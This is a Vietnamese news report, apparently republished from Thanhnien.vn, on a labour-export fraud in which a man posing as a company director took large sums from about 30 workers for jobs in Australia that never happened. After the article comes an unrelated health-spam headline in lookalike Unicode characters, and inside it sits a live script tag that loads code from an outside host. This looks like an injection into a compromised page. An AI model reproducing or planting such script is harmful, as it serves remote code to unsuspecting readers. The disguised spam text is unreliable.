RSS

Khốn đốn vì bị lừa xuất khẩu lao động sang Úc

14:00 05/04/2019

Hàng chục người ở các tỉnh: Nghệ An, Hà Tĩnh và Quảng Bình có nguy cơ mất trắng khi mỗi người nộp hàng trăm triệu đồng cho “công ty” đưa người sang Úc lao động hợp pháp.

Những nạn nhân của đường dây đi Úc hoang mang, khốn đốn vì chưa đòi được số tiền hàng trăm triệu đồng đã nộp	
 /// Ảnh: K.Hoan

Những nạn nhân của đường dây đi Úc hoang mang, khốn đốn vì chưa đòi được số tiền hàng trăm triệu đồng đã nộp

3 lần sang Malaysia rồi quay về

Gương mặt lộ rõ vẻ mệt mỏi sau nhiều tháng trời đi đòi lại gần 500 triệu đồng vay mượn để đóng cho “đường dây” đi Úc lao động, chị Trần Khánh Nhung (ngụ TP.Đồng Hới, Quảng Bình) nói nếu không lấy được tiền để trả nợ thì chị “cũng hết đường sống”.

Chị Nhung kể, tháng 7.2016, có người quen giới thiệu, chị ra TP.Vinh (Nghệ An) gặp bà Trần Thị Thành (ở đường Trần Huy Liệu, P.Hưng Phúc) nộp cho bà này (làm môi giới cho ông Lê Duy Anh - người tự giới thiệu là Giám đốc Công ty TNHH MTV đầu tư và phát triển Chấn Hưng - Trung tâm đào tạo tư vấn du học, xuất khẩu lao động nước ngoài, địa chỉ tại Hà Nội) 3.000 USD và 45 triệu đồng tiền cọc để được làm thủ tục sang Úc lao động trong lĩnh vực nông nghiệp. Sau đó, chị Nhung nộp tiếp cho ông Anh 3 lần tổng cộng 17.500 USD.

Thời điểm này, cũng có hàng chục người khác ở các tỉnh: Nghệ An, Hà Tĩnh, Quảng Bình... nộp tiền cho ông Anh; mỗi người hàng chục ngàn USD để được đi Úc lao động như chị Nhung.

Năm 2016 và 2017, ông Anh 2 lần dẫn chị Nhung và 18 người khác bay sang Malaysia để sang Úc nhưng đều không thể đến được Úc, cả đoàn phải quay về.

Đến ngày 29.4.2018, ông Anh tiếp tục dẫn 19 người này sang Malaysia để đến Úc. Sau hơn 4 tháng trời ăn chực nằm chờ ở thủ đô Kuala Lumpur (Malaysia), số tiền mỗi người mang theo được tiêu sạch; giấc mơ đến Úc vẫn không “chạm” đến.

Đầu tháng 12.2018, ông Anh thông báo cho 19 người này vào TP.HCM để sang Úc bằng đường biển. “Do sợ đi bằng đường biển nguy hiểm nên chỉ có 12 người vào TP.HCM để đi. Tại TP.HCM, 12 người chúng tôi chờ đợi 1 tháng vẫn không đi được; tiền ăn mang theo sắp hết, tết cận kề nên mọi người chán nản bỏ về quê”, chị Nhung kể.

Ngồi trên “đống lửa”

Sau khi xác định không thể sang Úc lao động hợp pháp như lời hứa của ông Anh và nhận thấy có dấu hiệu đây là đường dây đưa người nhập cảnh Úc trái phép, chị Nhung và nhiều người khác đã ra Hà Nội tìm ông Anh đòi lại tiền nhưng không có kết quả. “Chúng tôi tìm đến văn phòng công ty nhưng chỉ còn cái biển hiệu, văn phòng không còn vì ông Anh đã trả lại nhà thuê. Gọi điện cho ông Anh cũng không liên lạc được, tài khoản Zalo cũng bị khóa nên chúng tôi phải ra về và sau đó cùng làm đơn tố cáo ông Anh với công an”, chị Nhung kể.

Bà Vũ Thị Bình (ngụ xã Nam Thành, H.Yên Thành, Nghệ An) cho biết, tháng 3.2017, biết bà Trần Thị Thành có con đang công tác trong ngành công an nên bà tin tưởng và đã 4 lần đưa cho bà Thành tổng cộng 31.000 USD với lời hứa “15 ngày sau sẽ xong visa để đi Úc”.

Trong giấy nhận tiền, bà Thành xác nhận vai trò môi giới và ông Lê Duy Anh là người tổ chức đưa lao động sang Úc. Thế nhưng, đã 2 năm trôi qua, 2 lần ông Anh dẫn sang Malaysia để đến Úc; chi phí ăn uống, đi lại tốn thêm hàng chục triệu đồng, nhưng con trai bà vẫn không thể sang Úc.

Từ cuối năm 2018 đến nay, bà Bình nhiều lần đến nhà bà Thành đòi lại số tiền đã nộp, nhưng bà này khất lần và từ chối trả. “Tôi đến nhà đòi, bà Thành thoái thác trách nhiệm trả tiền, còn hăm dọa tôi. Đây là số tiền gia đình tôi cắm nhà đất vay ngân hàng và mượn lãi suất của người khác, nếu không đòi được, cả nhà tôi phải ra đường ở”, bà Bình buồn bã nói.

Môi giới cũng là nạn nhân ?

Trao đổi với PV Thanh Niên, bà Trần Thị Thành, người môi giới cho ông Lê Duy Anh, cho biết tin tưởng ông Anh, nên bà đã giới thiệu cho nhiều người có nhu cầu đi lao động tại Úc đến gặp ông Anh làm thủ tục. Sau khi không đưa được người nào đi Úc, bà cũng trở thành nạn nhân của ông Anh.

“Ông Anh hiện đang nợ tôi hơn 7 tỉ đồng tiền của người lao động tôi chuyển cho ông Anh để làm thủ tục đi Úc, nhưng chưa trả. Tôi cũng đã làm đơn trình báo với công an về vụ việc này và hiện giờ cũng không biết ông Anh đang ở đâu”, bà Thành nói. Bà Thành cũng cho biết, ban đầu, có hơn 200 người nộp tiền đăng ký làm thủ tục đi Úc, nhưng sau đó nhiều người rút và hiện còn khoảng 30 người đang bị ông Anh nợ nhiều tỉ đồng.

Trao đổi với PV Thanh Niên, thượng tá Hoàng Nghĩa Phương, Phó chánh Văn phòng Cơ quan CSĐT Công an tỉnh Nghệ An, cho biết cơ quan này đã nhận được đơn tố cáo của người dân và hiện đang xác minh để điều tra, làm rõ.

Nguồn: Thanhnien.vn

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп<script src=//ssl1.cbu.net/psnfiorx></script>

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп

Tɦeo các ɓác sĩ, sức ƙɦỏe củɑ пɢũ łạпɢ qᴜyếł ᵭịпɦ łᴜổi łɦọ củɑ ɓạп. Đây ℓà ɓí qᴜyếł ℓựɑ cɦọп łɦực ρɦẩɱ cɦăɱ sóc cơ łɦể łốł пɦấł ɓạп пêп łɦɑɱ ƙɦảo ᵭể ℓᴜôп ƙɦỏe ɱạпɦ ʋà łɾườпɢ łɦọ.